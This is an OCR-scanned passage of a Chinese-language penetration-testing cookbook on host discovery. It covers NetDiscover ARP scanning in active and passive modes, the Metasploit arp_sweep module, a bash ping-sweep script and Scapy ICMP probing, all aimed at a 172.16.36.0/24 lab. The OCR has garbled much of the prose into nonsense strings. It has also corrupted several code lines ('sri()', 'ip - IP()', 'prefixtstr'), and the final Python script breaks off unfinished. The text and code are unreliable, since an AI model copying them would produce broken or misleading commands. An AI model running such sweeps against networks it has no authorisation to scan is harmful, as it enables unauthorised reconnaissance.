NetDiscover 还 可 用 于 扫描 来 自 输入 文本 文件 的 IP 地 址 。 不 是 将 CIDR 范围 符号 
作为 参数 传递 ， -1 选项 可 以 与 输入 文件 的 名 称 或 路 径 结 合 使 用 : 


root@KaliLinux:~# netdiscover -1l iplist.txt 


Currently scanning: 172.16.36.0/24 | Screen View: Unique Hos 
ts 
39 Captured ARP Req/Rep packets, from 5 hosts. Total size: 234 
0 








IP At MAC Address Count Len MAC Vendor 
172.16.36.1 00:50:56:c0:00:08 08 480 VMWare, Inc. 
172.16.36.2 00:50:56: ff:2a:8e 08 480 VMWare, Inc. 


172.16.36.132 00:0c:29:65:fc:d2 08 480 VMware, Inc. 
172.16.36.135 00:0c:29:3d:84:32 08 480 VMware, Inc. 
172.16.36.254 00:50:56:ef:b9:9c 07 420 VMWare, Inc. 


将 此 工具 与 其 他 工具 区 分 开 的 另 一 个 独特 功能 是 执行 被 动 发 现 的 功能 。 对 整个 子 网 
中 的 每 个 IP 地 址 ARP 广播 请 求 有 时 可 以 触发 来 自 安 全 设备 (例如 入 侵 检 测 系 统 
(IDS) 或 入 侵 防 御 系 统 (IPS) ) 的 警报 或 响应 。 更 隐秘 的 方法 是 侦 听 ARP 流 
量 ， 因 为 扫描 系统 自然 会 与 网 络 上 的 其 他 系统 交互 ， 然 后 记录 从 ARP 响应 收集 的 
数据 。 这 种 被 动 扫描 技术 可 以 使 用 -p 选项 执行 : 


root@KaliLinux:~# netdiscover -p 


Currently scanning: (passive) | Screen View: Unique Hosts 
4 Captured ARP Req/Rep packets, from 2 hosts. Total size: 240 








172.16.36.132 00:0c:29:65:fc:d2 02 120 VMware, Inc. 
172.16.36.135 00:0c:29:3d:84:32 02 120 VMware, Inc. 


这 种 技术 在 收集 信息 方面 明显 更 慢 ， 因 为 请 求 必 须 作 为 正常 网 络 交互 的 结果 产生 ， 
但 是 它 也 不 会 引起 任何 不 必要 的 注意 。 如 果 它 在 无 线 网 络 上 运行 ， 这 种 技术 更 有 
效 ， 因 为 混杂 模式 下 ， 无 线 适配器 会 接收 到 目标 是 其 他 设备 的 ARP 应答 。 为 了 在 
交换 环境 中 有 效 工作 ， 你 需要 访问 SPAN X TAP? RF ELLER CAM 表 来 强制 交 
换 机 开始 广播 所 有 流量 。 


工作 原理 


NetDiscover ARP 发 现 的 基本 原理 与 我 们 之 前 所 讨论 的 第 2 层 发 现 方 法 的 基本 相 

同 。 这 个 工具 和 我 们 讨论 的 其 他 一 些 工 具 的 主要 区 别 ， 包 括 被 动 发 现 模式 ， 以 及 在 
输出 中 包含 MAC 厂商。 在 大 多 数 情 况 下 ， 被 动 模式 在 交换 网 络 上 是 无 用 的 ， 因 为 
ARP 响应 的 接收 仍然 需要 与 发 现 的 客户 端 执 行 一 些 交互 ， 尽 管 它 们 独立 于 
NetDiscover 工具 。 然而 ， 重 要 的 是 理解 该 特征 ， 及 其 它们 在 例如 集线器 或 无 线 网 
络 的 广播 网 络 中 可 能 会 有 用 。 NetDiscover 通过 评估 返回 的 MAC 地 址 的 前 半 部 分 
(前 3 个 字 节 /24 位 ) 来 识别 MAC 厂商 。 这 部 分 地 址 标识 网 络 接口 的 制造 商 ， 并 且 
通常 是 设备 其 余部 分 的 硬件 制造 商 的 良好 标识 。 


2.5 使 用 Metasploit 探索 第 二 层 


Metasploit 主要 是 漏洞 利用 工具 ， 这 个 功能 将 在 接 下 来 的 章节 中 详细 讨论 。 然而 ， 
除了 其 主要 功能 之 外 ，Metasploit 还 有 一 些 辅助 模块 ， 可 用 于 各 种 扫描 和 信息 收集 
任务 。 特别 是 ， 由 一 个 辅助 模块 可 以 用 于 在 本 地 子 网 上 执行 ARP 扫描 。 这 对 许多 
人 都 有 帮助 ， 因 为 Metasploit 是 大 多 数 渗透 测试 人 员 熟 悉 的 工具 ， 并 且 将 该 功能 人 
成 到 Metasploit 中 ， 减 少 了 给 定 测试 阶段 内 所 需 的 工具 总 数 。 这 个 特定 的 秘籍 演示 
了 如 何 使 用 Metasploit 来 执行 ARP 发 现 。 


准备 


要 使 用 Me pioi 执行 ARP 发 现 ， 


的 


系统 。 提供 


Windows Server’ 4x4 ° 


ERNE HY 


E ea pn. Af 用 框架 


信 
框架 


选 


你 需要 在 LAN 上 至 少 拥 有 一 个 响应 ARP 请 求 
供 的 示例 使 用 Linux 和 Windows 系统 的 组 合 。 有 关 在 本 地 实验 环境 中 
设置 系统 的 更 多 信息 ， 请 参阅 第 


一 章 入 中 的 “安装 Metasploitable2? 和 "安装 


> Metasploit 45 Zi X X 8j 4& Bh 4 


Rik > A dade 


息 收 集 。 特别 是 有 一 个 可 以 用 于 执行 第 二 层 发 现 的 辅助 模块 。 BB Hh Metasploit 
， 请 使 用 msfconsole 命令 。 然 后， 使 用 命令 结合 所 需 的 模块 来 配置 扫描 

root@KaliLinux:~# msfconsole 

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM 

MMMMMMMMMMM MMMMMMMMMM 

MMMN$ vMMMM 

MMMN1 MMMMM MMMMM JMMMM 

MMMN1 | MMMMMMMN NMMMMMMM JMMMM 

MMMN1 | MMMMMMMMMNmmmNMMMMMMMMM = JMMMM 

MMMNI  MMMMMMMMMMMMMMMMMMMMMMM . jMMMM 

MMMNI  MMMMMMMMMMMMMMMMMMMMMMM . jMMMM 

MMMNI  MMMMM MMMMMMM MMMMM — jMMMM 

MMMNI  MMMMM MMMMMMM MMMMM jMMMM 

MMMNI  MMMNM MMMMMMM MMMMM jMMMM 

MMMNI  WMMMM MMMMMMM MMMM# JMMMM 

MMMMR ?MMNM MMMMM .dMMMM 

MMMMNm ~?MMM MMMM~ dMMMMM 

MMMMMMN ?MM MM? NMMMMMN 

MMMMMMMMNe JMMMMMNMMM 

MMMMMMMMMMNm, eMMMMMNMMNMM 

MMMMNNMNMMMMMNX MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm:- . . +MMNMM 

NMNMMNMMNMM 


http://metasploit.pro 


Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting 


with Metasploit Pro -- type 


zl 
EI 
cd 


msf » use auxiliary/scanner/discovery/arp. sweep 
auxiliary(arp sweep) » 


msf 


择 模块 后 


'go pro' 


， 可 以 使 用 show options 命令 查看 


to launch it now. 
metasploit v4.6.0-dev [core:4.6 api:1.0] 


1053 exploits - 590 auxiliary - 174 post 
275 payloads - 28 encoders - 8 nops 


配置 选项 : 


msf  auxiliary(arp sweep) > show options 


Module options (auxiliary/scanner/discovery/arp sweep): 


Name Current Setting Required Description 

INTERFACE no The name of the interfa 
ce 

RHOSTS yes The target address rang 
e or CIDR identifier 

SHOST no Source IP Address 

SMAC no Source MAC Address 

THREADS 1 yes The number of concurren 
t threads 

TIMEOUT 5 yes The number of seconds t 


o wait for new data 


这 些 配置 选项 指定 要 扫描 的 目标 ， 扫 描 系 TRA RU 息 。 可 以 通过 检查 扫描 
系统 的 接口 配置 来 收集 用 于 该 特定 扫描 的 大 多 数 信息 & eau 可 à 方便 地 在 
Metasploit Framework 控制 台中 可 以 传 入 系统 shell 4» m r 。 在 以 下 示例 中 ， 我 们 在 
不 离开 Metasploit Framework 控制 台 界 面 的 情况 下 ， 进 行 系统 调用 来 执 

行 ifconfig 


msf auxiliary(arp_sweep) > ifconfig ethi 
[*] exec: ifconfig eth1 


eth1 Link encap:Ethernet Hwaddr 00:0c:29:09:c3:79 


inet addr:172.16.36.180 Bcast:172.16.36.255 Mask:255 
"2552550 

inet6 addr: fe80::20c:29ff:fe09:c379/64 Scope:Link 

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:1576971 errors:1 dropped:0 overruns:0 frame:0 

TX packets:1157669 errors:0 dropped:0 overruns:0 carri 
er:0 

collisions:0 txqueuelen:1000 

RX bytes:226795966 (216.2 MiB) TX bytes:109929055 (10 
4.8 MiB) 

Interrupt:19 Base address:0x2080 


用 于 此 扫描 的 接口 是 ethi 。 由 于 第 二 层 扫 描 仅 能 够 有 效 地 识别 本 地 子 网 上 的 活 
et a ze 
HIT > IP 地 址 和 子 网 掩 码 显 示 ， 我 们 应 扫描 172.16.36.0/24 范围 。 此 外 ， 可 
以 在 这 些 配 置 中 识别 dn 系统 的 源 IP 地 址 和 MAC 地 址 。 BV Metasploit 中 定义 
配置 ， 请 使 用 set 命令 ， 然 后 是 要 定义 的 变量 ， 然 后 是 要 赋 的 值 : 


msf  auxiliary(arp sweep) > set interface eth1 
interface => eth1 

msf auxiliary(arp_sweep) > set RHOSTS 172.16.36.0/24 
RHOSTS => 172.16.36.0/24 

msf auxiliary(arp_sweep) > set SHOST 172.16.36.180 
SHOST -» 172.16.36.180 

msf  auxiliary(arp sweep) > set SMAC 00:0c:29:09:c3:79 
SMAC -» 00:0c:29:09:c3:79 

msf  auxiliary(arp sweep) > set THREADS 20 

THREADS -» 20 

msf  auxiliary(arp sweep) > set TIMEOUT 1 

TIMEOUT => 1 


设置 扫描 配置 后 ， 可 以 使 用 show options 命令 再 次 查看 设置 。 现 在 应 显示 之 前 
设置 的 所 有 值 : 


msf  auxiliary(arp sweep) > show options 


Module options (auxiliary/scanner/discovery/arp sweep): 


Name Current Setting Required Description 

INTERFACE eth1 no The name of the inter 
face 

RHOSTS 172.16.36.0/24 yes The target address ra 
nge or CIDR identifier 

SHOST 172.16.36.180 no Source IP Address 

SMAC 00:0c:29:09:c3:79 no Source MAC Address 

THREADS 20 yes The number of concurr 
ent threads 

TIMEOUT 1 yes The number of seconds 


to wait for new data 


在 验证 所 有 设置 配置 正确 后 ， 可 以 使 用 run 命令 启动 打 描 。 此 特定 模块 将 打印 出 
使 用 ARP 发 现 的 任何 活动 主机 。 它 还 会 识别 网 卡 (NIC) 供应 商 ， 它 由 发 现 的 主 
机 的 MAC 地 址 中 的 前 3 个 字 节 定义 : 


msf auxiliary(arp_sweep) > run 


[*] 172.16.36.1 appears to be up (VMware, Inc.). 
[*] 172.16.36.2 appears to be up (VMware, Inc.). 
[*] 172.16.36.132 appears to be up (VMware, Inc. 
[*] 172.16.36.135 appears to be up (VMware, Inc. 
[*] 
a 
[*] 


~ 


172.16.36.254 appears to be up (VMware, Inc. 
Scanned 256 of 256 hosts (100% complete) 
Auxiliary module execution completed 


工作 原理 


Metasploit 执行 ARP 发 现 的 基本 原理 是 相同 的 : 广播 一 系列 ARP 请 求 ， 记 录 并 输 
出 ARP 响应 。 Metasploit 辅助 模块 的 输出 提供 所 有 活动 系统 的 IP 地 址 ， 然 后 ， 它 
还 在 括号 中 提供 MAC 厂商 名 称 。 


2.6 使 用 ICMP 探索 第 三 


第 三 层 的 发 现 可 能 是 网 络 管理 员 和 技术 人 员 中 最 常用 的 工具 。 第 三 层 的 发 现 使 用 著 
名 的 | ICMP ping 来 识别 活动 主机 。 此 秘籍 演示 了 如 何 使 用 ping 工具 在 远程 主机 上 
执行 第 三 层 发 现 。 


使 用 ping 执行 第 三 层 发 现 不 需要 实验 环境 ， 因 为 Internet 上 的 许多 系统 都 将 回复 
ICMP 回 显 请 求 。 但 是 ， 强 烈 建议 你 只 在 您 自己 的 实验 环境 中 执行 任何 类 型 的 网 络 
扫描 ， 除 非 你 受到 任何 管理 机 构 施 加 的 法 律 法 规 。 如 果 你 希望 在 实验 环 
境 中 执行 此 技术 ， 你 需要 至 少 有 一 个 响应 ICMP 请 求 的 系统 。 在 提供 的 示例 中 ， 使 
用 Linux 和 Windows 系统 的 组 合 。 有 关 在 本 地 实验 环境 中 设置 系统 的 更 多 信息 ， 
请 参阅 第 一 章 中 的 “安装 Metasploitable2" 和 "安装 Windows Server" 秘籍 。 此 外 ， 本 
节 还 需要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 关 编 写 脚本 
的 更 多 信息 ， 请 参阅 第 一 章 中 的 “使 用 文本 编辑 器 (VIM 和 Nano) "秘籍 。 


操作 步骤 


KS BENT 行业 工作 的 人 都 相当 熟悉 ping LHe BIA ping 确定 主机 是 否 处 
于 活动 状态 ， 你 只 需要 向 命令 传递 参数 来 定义 要 测 1 试 的 IP 地 址 : 


root@KaliLinux:~# ping 172.16.36.135 

PING 172.16.36.135 (172.16.36.135) 56(84) bytes of data. 

64 bytes from 172.16.36.135: icmp_req=1 ttl-64 time=1.35 ms 

64 bytes from 172.16.36.135: icmp req-2 ttl-64 time-0.707 ms 
64 bytes from 172.16.36.135: icmp req-3 ttl-64 time-0.369 ms 
^C 

--- 172.16.36.135 ping statistics -- 

3 packets transmitted, 3 received, 0% packet loss, time 2003ms 
rtt min/avg/max/mdev = 0.369/0.809/1.353/0.409 ms 


发 出 此 命令 时 ，ICMP 回 显 请 求 将 直接 发 送 到 提供 的 IP 地 址 。 为 了 接收 对 此 ICMP 
回 显 请 求 的 回复 ， 必 须 满足 几 个 条 件 。 这 些 条 件 如 下 


测试 的 IP 地 址 必须 分 配给 系统 

系统 必须 处 于 活动 状态 并 在 线 

必须 存在 从 扫描 系统 到 目标 IP 的 可 用 路 由 

系统 必须 配置 为 响应 ICMP 流量 

扫描 系统 和 配置 为 丢弃 ICMP 流量 的 目标 IP 之 间 没 有 基于 主机 或 网 络 防火 墙 


你 可 以 看 到 ， 有 很 多 变量 成 为 ICMP 发 现 的 成 功 因素 。 正 是 由 于 这 个 原因 ，ICMP 
可 能 有 点 不 可 靠 ， 但 与 ARP 不 同 ， 它 是 一 个 可 路 由 的 协议 ， 可 用 于 发 现 局 域 网 外 
的 主机 。 请 注意 ， 在 前 面 的 示例 中 ， 在 ping 命令 显示 的 输出 中 出 现 AC o 这 
表示 使 用 了 转 义 序列 (ARR ctrl + C ) 来 停止 进程 。 与 Windows 不 同 ， 
默认 情况 下 ， 集 成 到 Linux 操作 系统 的 ping 命令 会 无 限 ping 目标 主机 。 但 
是 ， -c 选项 可 用 于 指定 要 发 送 的 ICMP 请 求 数 。 使 用 此 选项 ， 一 旦 达到 超时 或 
每 个 发 送 的 数据 包 的 回复 已 接收 ， 过 程 将 正常 结束 。 看 看 下 面 的 命令 : 


root@KaliLinux:~# ping 172.16.36.135 -c 2 

PING 172.16.36.135 (172.16.36.135) 56(84) bytes of data. 

64 bytes from 172.16.36.135: icmp_req=1 ttl-64 time-0.611 ms 
64 bytes from 172.16.36.135: icmp req-2 ttl-64 time-0.395 ms 
--- 172.16.36.135 ping statistics -- 

2 packets transmitted, 2 received, 0% packet loss, time 1000ms 
rtt min/avg/max/mdev - 0.395/0.503/0.611/0.108 ms 


5 ARPing 相同 的 方式 可 以 在 bash 脚本 中 使 用 ， 通 过 并 行 地 循环 遍历 多 个 

IP， ping 可 以 与 bash 脚本 结合 使 用 ， 来 在 多 个 主机 上 并 行 执行 第 三 层 发 现 。 为 
了 编写 脚本 ， 我 们 需要 确定 与 成 功 和 失败 的 ping 请 求 相 关 的 各 种 响应 。 为 此 ， 我 
们 应 该 首先 ping 一 个 我 们 知道 它 活动 并 响应 ICMP 的 主机 ， 然 后 使 用 ping 请 求 跟 
踪 一 个 无 响应 的 地 址 。 以 下 命令 演示 了 这 一 点 : 


root@KaliLinux:~# ping 74.125.137.147 -c 1 

PING 74.125.137.147 (74.125.137.147) 56(84) bytes of data. 

64 bytes from 74.125.137.147: icmp seq-1 ttl-128 time-31.3 ms 
--- 74.125.137.147 ping statistics -- 

1 packets transmitted, 1 received, 0% packet loss, time Oms 
rtt min/avg/max/mdev - 31.363/31.363/31.363/0.000 ms 
root@KaliLinux:~# ping 83.166.169.231 -c 1 

PING 83.166.169.231 (83.166.169.231) 56(84) bytes of data. 
--- 83.166.169.231 ping statistics -- 

1 packets transmitted, 0 received, 100% packet loss, time Oms 


与 ARPing 请 求 一 样 ， 来 自 唯一 字符 串 的 字 节 只 存在 在 与 活动 P 地 址 相关 的 输出 
中 ， 并 且 也 位 于 包含 此 地 址 的 行 上 。 使 用 同样 的 方式 ， 我 们 可 以 使 
用 grep 和 cut 的 组 合 , 从 任何 成 功 的 ping 请 求 中 提取 IP 地 址 : 


root@KaliLinux:~# ping 74.125.137.147 -c 1 | grep "bytes from" 
64 bytes from 74.125.137.147: icmp seq-1 ttl-128 time-37.2 ms 
root@KaliLinux:~# ping 74.125.137.147 -c 1 | grep "bytes from" | 
cut -d "" -f 4 

74.125.137.147: 

root@KaliLinux:~# ping 74.125.137.147 -c 1 | grep "bytes from" | 
CU -00 sq Fae Gute rds ess 

74.125.137.147 


通过 在 包含 一 系列 目标 IP 地 址 的 循环 中 使 用 此 任务 序列 ， 我 们 可 以 快速 识别 响应 
ICMP 回 显 请 求 的 活动 主机 。 输出 是 一 个 简单 的 的 活动 IP 地 址 列表 。 使 用 此 技术 
的 示例 脚本 如 下 所 示 : 


#!/bin/bash 


if [ "$#" -ne 1 ]; then 

echo "Usage - ./ping sweep.sh [/24 network address]" 

echo "Example - ./ping sweep.sh 172.16.36.0" 

echo " Example will perform an ICMP ping sweep of the 172.16 
.36.0/24 network" 


exit 
fi 
prefix=$(echo $1 | cut -d '.' -f 1-3) 
for addr in $(seq 1 254); do 
ping -c 1 $prefix.$addr | grep "bytes from" | cut -d " " -f 
4 | cut -d Wats -f 1 & 
done 


在 提供 的 bash 脚 本 中 ， 第 一 行 定义 了 bash 解释 器 的 位 置 。 接 下 来 的 代码 块 执行 测 
试 来 确定 是 否 提 供 了 预期 的 一 个 参数 。 这 通过 评估 提供 的 参数 的 数量 是 否 不 等 于 1 
来 确定 。 如 果 未 提供 预期 参数 ， 则 输出 脚本 的 用 法 ， 并 且 退 出 脚本 。 用 法 输出 表 
明 ， 脚 本 接受 / 24 网 络 地 址 作为 参数 。 下 一 行 代码 从 提供 的 网 络 地 址 中 提取 网 络 
前 级 。 例 如 ， 如 果 提 供 的 网 络 地 址 是 192.168.11.0 ， 则 前 级 变量 将 被 赋值 

为 192.168.11 。 然 后 使 用 for 循环 遍历 最 后 一 个 字 节 的 值 ， 来 在 本 地 / 24 网 
络 中 生成 每 个 可 能 的 IP 地 址 。 对 于 每 个 可 能 的 IP 地 址 ， 执 行 单个 ping 命令 。 然 
后 通过 管道 传输 每 个 请 求 的 响应 ， 然 后 使 用 grep 来 提取 带 有 短语 bytes 的 行 。 
这 只 会 提取 包含 活动 主机 的 IP 地 址 的 行 。 最 后 ， 使 用 一 系列 cut 有 函数 从 该 输出 中 
提取 IP 地 址 。 请 注意 ， 在 for 循环 任务 的 末尾 使 用 & 符号 ， 而 不 是 分 号 。 该 符 
号 能 够 并 行 执行 任务 ， 而 不 是 顺序 执行 。 这 极 大 地 减少 了 扫描 IP 范围 所 需 的 时 

间 。 然 后 ， 可 以 使 用 句号 和 和 斜 杠 ， 并 带 上 是 可 执行 脚本 的 名 称 来 执行 脚本 : 


root@KaliLinux:~# ./ping sweep.sh 

Usage - ./ping sweep.sh [/24 network address] 

Example - ./ping sweep.sh 172.16.36.0 

Example will perform an ICMP ping sweep of the 172.16.36.0/24 ne 
twork 

root@KaliLinux:~# ./ping sweep.sh 172.16.36.0 

172.16.36.2 

172.16.36.1 

172.16.36.232 

172.16.36.249 


当 在 没有 提供 任何 参数 的 情况 下 执行 时 ， 脚 本 会 返回 用 法 。 但 是 ， 当 使 用 网 络 地 址 
值 执行 时 ， 任 务 序列 开始 执行 ， 并 返回 活动 |P 地 址 的 列表 。 如 前 面 的 脚本 中 所 讨 
论 的 那样 ， 此 脚本 的 输出 也 可 以 重 定向 到 文本 文件 ， 来 供 将 来 使 用 。 这 可 以 使 用 灾 


括号 ， 后 跟 输 出 文件 的 名 称 来 实现 。 


root@KaliLinux:~# ./ping sweep.sh 172.16.36.0 > output.txt 
root@KaliLinux:~# ls output.txt output.txt 
root@KaliLinux:~# cat output.txt 172.16.36.2 

172.16.36.1 

172.16.36.232 

172.16.36.249 


在 提供 的 示例 中 ， 1s 命令 用 于 确认 输出 文件 已 创建 。 通过 将 文件 名 作为 参数 传 
BA cat 命令 ， 可 以 查看 此 输出 文件 的 内 容 。 


工作 原理 


Ping 是 IT 行业 中 众所周知 的 工具 ， 其 现 有 功能 能 用 于 识别 活动 主机 。 然而 ， 它 的 
目的 是 为 了 发 现 单个 主机 是 否 存活 ， 而 不 是 作为 扫描 工具 。 这 个 秘籍 中 的 bash Wy 
本 基本 上 与 在 / 24 CIDR 范 围 中 对 每 个 可 能 的 IP 地址 使 用 ping 相同 。 但 是 ， 我 
们 不 需要 手动 执行 这 种 繁 开 的 任务 ，bash 允许 我 们 通过 循环 传递 任务 序列 来 快 
速 ， 轻 松 地 执行 此 任务 。 


2.7 使 用 Scapy 发 现 第 三 层 


Scapy 是 一 种 工具 ， 允 许 用 户 制作 并 向 网 络 中 注入 自 定义 数据 包 。 此 工具 可 以 用 于 
构建 ICMP 协议 请 求 ， 并 将 它们 注入 网 络 来 分 析 响 应 。 这 个 特定 的 秘籍 演示 了 如 何 
使 用 Scapy 在 远程 主机 上 执行 第 3 层 发 现 。 


准备 


使 用 Scapy 执行 第 三 层 发 现 不 需要 实验 环境 ， 因 为 Internet 上 的 许多 系统 都 将 回复 
ICMP 回 显 请 求 。 但 是 ， 强 烈 建议 你 只 在 您 自己 的 实验 环境 中 执行 任何 类 型 的 网 络 
扫描 ， 除 非 你 完全 熟悉 您 受到 任何 管理 机 构 施 加 的 法 律 法 规 。 如 果 你 希望 在 实验 环 
境 中 执行 此 技术 ， 你 需要 至 少 有 一 个 响应 ICMP 请 求 的 系统 。 在 提供 的 示例 中 ， 使 
用 Linux 和 Windows 系统 的 组 合 。 有 关 在 本 地 实验 环境 中 设置 系统 的 更 多 信息 ， 
请 参阅 第 一 章 中 的 “安装 Metasploitable2? 和 "安装 Windows Server" $548 » JE? > A 
节 还 需要 使 用 文本 编辑 器 (如 VIM 或 Nano) 将 脚本 写 入 文件 系统 。 有 关 编 写 脚本 
的 更 多 信息 ， 请 参阅 第 一 章 中 的 “使 用 文本 编辑 器 (VIM fe Nano) "秘籍 。 


操作 步骤 


为 了 使 用 Scapy 发 送 ICMP 回 显 请 求 ， 我 们 需要 开始 堆 硬 层级 来 发 送 请 求 。 HE 
数据 包 时 的 一 个 好 的 经 验 法 则 是 ,通过 OSI 按照 的 各 层 进 行 处 理 。 你 可 以 通过 使 用 
斜 杠 分 隔 每 个 层级 来 堆 否 多 个 层级 。 为 了 生成 ICMP 回 显 请 求 ，IP 层 需要 与 ICMP 
Th RIE o 为 了 开始 ， 请 使 用 scapy 命令 打开 Scapy 交互 式 控制 台 ， 然 后 

将 IP HARARE: 


root@KaliLinux:~# scapy Welcome to Scapy (2.2.0) 
»»» ip - IP() 
>>> ip.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= ip 
chksum= None 
src= 127.0.0.1 
dst= 127.0.0.1 
\options\ 


TESTA BAe Uk Be ^ TARAKA display() 函数 来 验证 更 改 。 请 
注意 ， 当 目标 IP 地 址 值 更 改 为 任何 其 他 值 时 ， 源 地 址 也 会 从 回 送 地 址 自动 更 新 为 
与 默认 接口 关联 的 IP 地 址 。 现 在 Ip 对 象 的 属性 已 经 适当 修改 了 ， 我 们 将 需 

在 我 们 的 封包 栈 中 创建 第 二 层 。 要 添加 到 栈 的 下 一 个 层 是 ICMP 层 ， 我 们 将 其 赋 给 
单独 的 变量 : 


>>> ping = ICMP() 
>>> ping.display() 
###[ ICMP ]### 

type= echo-request 

code= 0 

chksum= None 

id= 0x0 

seq= 0x0 


在 所 提供 的 示例 中 ，ICMP 对 象 使 用 ping 变量 名 称 初始 化 。 然后 可 以 调 

用 display() 函数 来 显示 ICMP 属性 的 默认 配置 。 为 了 执行 ICMP 回 显 请 求 ， 默 
认 配 置 就 足够 了 。 现在 两 个 层 都 已 正确 配置 ， 它 们 可 以 堆 壹 来 准备 发 送 。 在 
Scapy 中 ， 可 以 通过 使 用 斜 杠 分 隔 每 个 层级 来 扒 登 层级 。 看 看 下 面 的 命令 集 : 


>>> ping request = (ip/ping) 
>>> ping request.display() 
###[ IP ]### 
version= 4 
ihl= None 
tos= 0x0 
len= None 
id= 1 
flags= 
frag- 0 
ttl= 64 
proto= icmp 
chksum= None 
src= 172.16.36.180 
dst= 172.16.36.135 
\options\ 
###[ ICMP ]### 
type= echo-request 
code= 0 
chksum= None 
id= 0x0 
seq= 0x0 


— HJ d E TRIS EY display() 函数 可 以 显示 整个 栈 。 以 这 种 方式 堆 
司 层 的 过 程 通常 被 称 为 数据 报 封装 。 现 在 已 经 堆 合 了 层级 ， 并 已 经 准备 好 发 送 请 
求 。 这 可 以 使 用 Scapy 中 的 sri() 函数 来 完成 : 


>>> ping reply = sri(ping request) 
..Begin emission: 


Finished to send 1 packets. 
* 


Received 15 packets, got 1 answers, remaining 0 packets 
>>> ping reply.display() 
###[ IP ]### 
version= 4L 
ihl- 5L 
tos- 0x0 
len- 28 
id- 62577 
flags- 
frag- OL 
ttl- 64 
proto- icmp 
chksum- 0xe513 
src- 172.16.36.135 
dst- 172.16.36.180 
NoptionsN 
###[ ICMP ]### 
type= echo-reply 
code= 0 
chksum= Oxf fff 
id= 0x0 
seq= 0x0 
###[ Padding ]### 
load= '\x0O0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ 
X00NX00N xO0\x00\x00\x00' 


在 提供 的 示例 中 ， sri() SS T ping reply 变量 。 这 将 执行 该 函数 ， 然 
后 将 结果 传递 给 此 变量 。 在 接收 到 响应 后 ， 在 ping reply 变量 上 调 

用 display() 有 函数 来 查看 响应 的 内 容 。 请 注意 ， 此 数据 包 是 从 我 们 发 送 初始 请 求 
的 主机 发 送 的 ， 目 标 地 址 是 Kali 系统 的 IP 地 址 。 另 外， 注意 响应 的 ICMP 类 型 是 
回应 应 答 。 基于 此 示例 ， 使 用 Scapy 发 送 和 接收 ICMP 的 过 程 看 起 来 很 有 用 ， 但 
如 果 你 尝试 对 非 响 应 的 目标 地 址 使 用 相同 的 步骤 ， 你 会 很 快 注意 到 问题 : 


>>> ip.dst = "172.16.36.136" 

>>> ping request = (ip/ping) 

>>> ping reply = sri(ping request) 
.Begin emission: 


*** {TRUNCATED} *** 


示例 输出 被 截断 ， 但 此 输出 应 该 无 限 继续 ， 直 到 你 使 用 ctrl c 强制 关闭 。 不 向 
函数 提供 超时 值 ， sr1() 函数 会 继续 监听 ， 直 到 接收 到 响应 。 如 果 主 机 不 是 活动 
的 ， 或 者 如 果 IP 地 址 没有 与 任何 主机 关联 ， 则 不 会 发 送 响应 ， 并 且 该 功能 也 不 会 
退出 。 为 了 在 脚本 中 有 效 使 用 此 函数， 应 定义 超时 值 : 


>>> ping reply = sri(ping request, timeout=1) 
.Begin emission: 


Received 3982 packets, got 0 answers, remaining 1 packets 


通过 提供 超时 值 作为 传递 给 sr1() 函数 的 第 二 个 参数 ， 如 果 在 指定 的 秒 数 内 没有 

收 到 响应 ， 进 程 将 退出 。 在 所 提供 的 示例 中 ， sri() 函数 用 于 将 ICMP 请 求 发 送 
到 无 响应 地 址 ， 因 为 未 收 到 响应 ， 会 在 1 秒 后 退出 。 到 目前 为 止 提 供 的 示例 中 ， 我 
们 将 函数 赋值 给 变量 ， 来 创建 持久 化 和 可 操作 的 对 象 。 但 是 ， 这些 函数 不 必 复 制 给 
变量 ， 也 可 以 通过 直接 调用 函数 生成 。 


>>> answer = sri(IP(dst-z"172.16.36.135")/ICMP(), timeout-1) 
.Begin emission: 
* 
Finished to send 1 packets. 
Received 5 packets, got 1 answers, remaining © packets 
>>> response.display() 
HHH [ IP ]### 
version= 4L 
ihl- 5L 
tos- 0x0 
len- 28 
id- 62578 
flags- 
frag- OL 
ttl- 64 
proto- icmp 
chksum- 0xe512 
Src- 172.16.36.135 
dst- 172.16.36.180 
NoptionsN 
###[ ICMP ]### 
type= echo-reply 
code= 0 
chksum- Oxffff 
id- 0x0 
seq= 0x0 
###[ Padding ]### 
load- 'Nx00Nx00Nx00NXx00NXx00NXOONXOONXOONXOONXOONXOONXOON 
X00NX00N x00Nx00Nx00Nx00 ' 


在 这 里 提供 的 示例 中 ， 之 前 使 用 四 个 单独 的 命令 完成 的 所 有 工作 ， 实 际 上 可 以 通过 
直接 调用 函数 的 单个 命令 来 完成 。 请 注意 ， 如 果 在 超时 值 指 定 的 时 间 范 围 内 ， 
ICMP 请 求 没 有 收 到 IP 地 址 的 回复 ， 调 用 对 象 会 产生 异常 。 由 于 未 收 到 响应 ， 
此 此 示例 中 赋值 为 响应 的 应 答 变 量 不 会 初始 化 : 


>>> answer = sri(IP(dst="83.166.169.231")/ICMP(),timeout=1) 
Begin emission: 


Received 1180 packets, got 0 answers, remaining 1 packets 

>>> answer.display() 

Traceback (most recent call last): File "<console>", line 1, in 
«module» AttributeError: 'NoneType' object has no attribute 'di 
splay' 


有 关 这 些 不 同 响 应 的 知识 ， 可 以 用 于 生成 在 多 个 IP 地 址 上 按 顺序 执行 ICMP 请 求 
的 脚本 。 脚本 会 循环 遍历 目标 IP 地 址 中 最 后 一 个 和 八 位 字 节 的 所 有 可 能 值 ， 并 为 每 
个 值 发 送 一 个 ICMP 请 求 。 当 从 每 个 sr1() 元 数 返 回 时 ， 将 评估 响应 来 确定 是 否 
接收 到 应 答 的 响应 : 


#!/usr/bin/python 


import logging 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 
from scapy.all import * 


if len(sys.argv) !- 2: 

print "Usage - ./pinger.py [/24 network address]" 

print "Example - ./pinger.py 172.16.36.0" 

print "Example will perform an ICMP scan of the 172.16.36.0/ 
24 range" 

sys.exit() 


address - str(sys.argv[1]) 
prefix = address.split('.')[0] + '.' + address.split('.')[1] + ' 
." + address .split(*.")[2] 十 


for addr in range(1, 254): 
answer=sr1(ARP(pdst=prefixtstr(addr)), timeout=1, verbose=0 ) 


